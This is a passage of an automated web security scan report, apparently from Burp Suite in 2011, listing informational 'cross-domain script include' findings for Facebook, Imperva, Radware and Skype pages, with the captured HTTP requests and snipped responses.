<!-- Start Demos on Demand code -->
<script type="text/javascript" src="http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp"></script>
...[SNIP]...
<!-- Google Site Search -->
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
<!-- End of HubSpot Logging Code -->


<script type="text/javascript" language="JavaScript"
src="http://dce.sapha.com/engine.php?ac=2522">
</script>
...[SNIP]...

18.532. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.52.48
X-Cnection: close
Date: Sun, 04 Sep 2011 16:17:47 GMT
Content-Length: 11138

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...

18.533. http://www.imperva.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imperva.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html HTTP/1.1
Host: www.imperva.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=12894255.241819409.1315153130.1315153130.1315153130.1; __utmb=12894255.1.10.1315153130; __utmc=12894255; __utmz=12894255.1315153130.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Houlihan%20Lokey; ASPSESSIONIDCQAAQTQD=KEKFHNIBACEGGNMNEIPGAOBE

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:20:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_Head1"><meta http-equiv=
...[SNIP]...
<!-- SFDC ***************************************************************************************** -->
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="https://trackalyzer.com/trackalyze_secure.js"></script>
...[SNIP]...

18.534. http://www.imperva.com/products/wsc_web-application-firewall.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imperva.com
Path:   /products/wsc_web-application-firewall.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/wsc_web-application-firewall.html HTTP/1.1
Host: www.imperva.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta http-equiv="Cont
...[SNIP]...
</script>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?pub=ImpervaWebmaster"></script>
...[SNIP]...
<!-- SFDC ***************************************************************************************** -->
<script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="https://trackalyzer.com/trackalyze_secure.js"></script>
...[SNIP]...

18.535. http://www.radware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radware.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.radware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.radware.com&SiteLanguage=1033; EktGUID=f0e1f9a9-288d-4d6f-b42a-99d60033449b; EkAnalytics=0; ASP.NET_SessionId=inao2q55xdagir45kkcxtr3o; CLEQ_a=c096cc0ad21546748f90da820df20000.1; CLEQ_t=1; CLEQ_y=1; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315146025591:ss=1315145946506

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:56 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta h
...[SNIP]...
</form>

<script type="text/javascript" src="http://radware.trk.sodoit.com/rts.js"></script>
...[SNIP]...

18.536. http://www.radware.com/Resources/AppWallSolution.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radware.com
Path:   /Resources/AppWallSolution.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Resources/AppWallSolution.aspx?source=google&9gtype=search&9gkw=web%20application%20security&9gad=8494610116.1&9gpla=&9gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw HTTP/1.1
Host: www.radware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:48 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="X-U
...[SNIP]...
<!-- END OF SmartSource Data Collector TAG -->    
<script type="text/javascript" src="http://radware.trk.sodoit.com/rts.js"></script>
...[SNIP]...

18.537. http://www.radware.com/gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radware.com
Path:   /gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw HTTP/1.1
Host: www.radware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.radware.com&SiteLanguage=1033; EktGUID=f0e1f9a9-288d-4d6f-b42a-99d60033449b; EkAnalytics=0; ASP.NET_SessionId=inao2q55xdagir45kkcxtr3o; CLEQ_a=c096cc0ad21546748f90da820df20000.1; CLEQ_t=1; CLEQ_y=1; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315145946506:ss=1315145946506

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 16:19:52 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><tit
...[SNIP]...
</form>
<script type="text/javascript" src="http://radware.trk.sodoit.com/rts.js"></script>
...[SNIP]...

18.538. http://www.skype.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.skype.com
Proxy-Connection: Keep-Alive
Cookie: s_vi=[CS]v1|2731DE37051D260E-4000010C00147A96[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:18:30 GMT
Server: Apache
X-Handler: 404.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 36319
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.539. http://www.skype.com/intl/[LC]/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/[LC]/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/[LC]/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:40:26 GMT
Server: Apache
X-Handler: 404.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 36319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.540. http://www.skype.com/intl/_application/content/error_pages/404/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/_application/content/error_pages/404/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/_application/content/error_pages/404/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Date: Sun, 04 Sep 2011 21:40:32 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 6972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Forbidd
...[SNIP]...
<!-- Default javascripts -->
   
       <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<body>


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.541. http://www.skype.com/intl/en-gb/campaigns/toolbar/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-gb/campaigns/toolbar/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-gb/campaigns/toolbar/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:10 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46535


<!DOCTYPE html>
<html lang="en-GB" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Thanks for installing the Skype Toolbar</title>
   <meta name="description" content="" />
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.542. http://www.skype.com/intl/en-gb/legal/privacy/general/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-gb/legal/privacy/general/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-gb/legal/privacy/general/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:11 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 71021


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB" >
<hea
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.543. http://www.skype.com/intl/en-us/business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 84912


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Business Phone Systems - Skype for Business - Skype</title>
   <meta name="description" co
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.544. http://www.skype.com/intl/en-us/business-user-guide/pc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business-user-guide/pc/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business-user-guide/pc/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 13037

<!DOCTYPE html>
<html lang="en-US" >
<head>
   <title>Using Skype for business</title>
   <meta name="description" content="" />
   <meta name="keywords" content="" />
   <!-- Meta -->
   <meta http-equi
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.545. http://www.skype.com/intl/en-us/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 84912


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Business Phone Systems - Skype for Business - Skype</title>
   <meta name="description" co
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.546. http://www.skype.com/intl/en-us/business/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/download

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/download HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:39 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 58917


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Business Software - Download Skype for Business - Skype</title>
   <meta name="description
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.547. http://www.skype.com/intl/en-us/business/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/download/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 58917


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Business Software - Download Skype for Business - Skype</title>
   <meta name="description
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.548. http://www.skype.com/intl/en-us/business/group-video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/business/group-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/business/group-video HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 51753


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Group video calling - host real-time video conferences on Skype</title>
   <meta name="des
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
